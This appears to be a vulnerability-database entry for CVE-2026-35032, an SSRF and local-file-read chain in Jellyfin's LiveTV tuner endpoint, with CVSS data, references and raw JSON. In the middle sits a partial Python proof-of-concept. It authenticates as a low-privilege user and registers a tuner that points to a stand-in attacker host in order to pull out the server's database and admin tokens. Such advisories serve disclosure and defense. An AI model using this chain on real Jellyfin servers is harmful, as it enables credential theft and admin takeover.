Security Vulnerability Report
CVE-2026-35032 CVSS 8.1 HIGH

Published: 2026-04-14 23:16:29
Last Modified: 2026-04-23 14:03:10

Description

Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain a vulnerability chain in the LiveTV M3U tuner endpoint (POST /LiveTv/TunerHosts), where the tuner URL is not validated, allowing local file read via non-HTTP paths and Server-Side Request Forgery (SSRF) via HTTP URLs. This is exploitable by any authenticated user because the EnableLiveTvManagement permission defaults to true for all new users. An attacker can chain these vulnerabilities by adding an M3U tuner pointing to an attacker-controlled server, serving a crafted M3U with a channel pointing to the Jellyfin database, exfiltrating the database to extract admin session tokens, and escalating to admin privileges. This issue has been fixed in version 10.11.7. If users are unable to upgrade immediately, they can disable Live TV Management privileges for all users.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* - VULNERABLE
Jellyfin < 10.11.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Concept for CVE-2026-35032

# Attacker controlled server URL
attacker_server = "http://attacker-controlled.com"

# Target Jellyfin Instance
target_url = "http://jellyfin-target:8096"
username = "low_priv_user"
password = "password"

# 1. Authenticate and get API Key
session = requests.Session()
auth_payload = {"Username": username, "Pw": password}
auth_resp = session.post(f"{target_url}/Users/authenticatebyname", json=auth_payload)
access_token = auth_resp.json().get("AccessToken")
headers = {
    "X-Emby-Authorization": (
        f'MediaBrowser Client="Jellyfin Web", Device="Firefox", '
        f'DeviceId="xxx", Version="10.11.0", Token="{access_token}"'
    )
}

# 2. Add Malicious M3U Tuner pointing to attacker server
# The attacker server serves an M3U containing a reference to the local DB
# (e.g., file:///config/data/jellyfin.db)
tuner_payload = {
    "Type": "m3u",
    "Url": f"{attacker_server}/malicious_playlist.m3u",
    "FriendlyName": "Exploit Tuner",
}
add_tuner = session.post(f"{target_url}/LiveTv/TunerHosts", json=tuner_payload, headers=headers)
print(f"Added tuner status: {add_tuner.status_code}")

# 3. Trigger Refresh/Scan to force Jellyfin to parse the M3U and read the local file
# The file content (DB) will be sent back to the attacker server via the URL specified
# in the M3U or logged in traffic depending on the specific SSRF implementation details.
print("Check attacker server logs for exfiltrated database content.")

References

https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7 (Product, Release Notes)
https://github.com/jellyfin/jellyfin/security/advisories/GHSA-8fw7-f233-ffr8 (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35032", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:28.660", "lastModified": "2026-04-23T14:03:09.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain a vulnerability chain in the LiveTV M3U tuner endpoint (POST /LiveTv/TunerHosts), where the tuner URL is not validated, allowing local file read via non-HTTP paths and Server-Side Request Forgery (SSRF) via HTTP URLs. This is exploitable by any authenticated user because the EnableLiveTvManagement permission defaults to true for all new users. An attacker can chain these vulnerabilities by adding an M3U tuner pointing to an attacker-controlled server, serving a crafted M3U with a channel pointing to the Jellyfin database, exfiltrating the database to extract admin session tokens, and escalating to admin privileges. This issue has been fixed in version 10.11.7. If users are unable to upgrade immediately, they can disable Live TV Management privileges for all users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.11.7", "matchCriteriaId": "16256CB1-CEA1-4216-B492-D9016420F60D"}]}]}], "references": [{"url": "https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/jellyfin/jellyfin/security/advisories/GHSA-8fw7-f233-ffr8", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}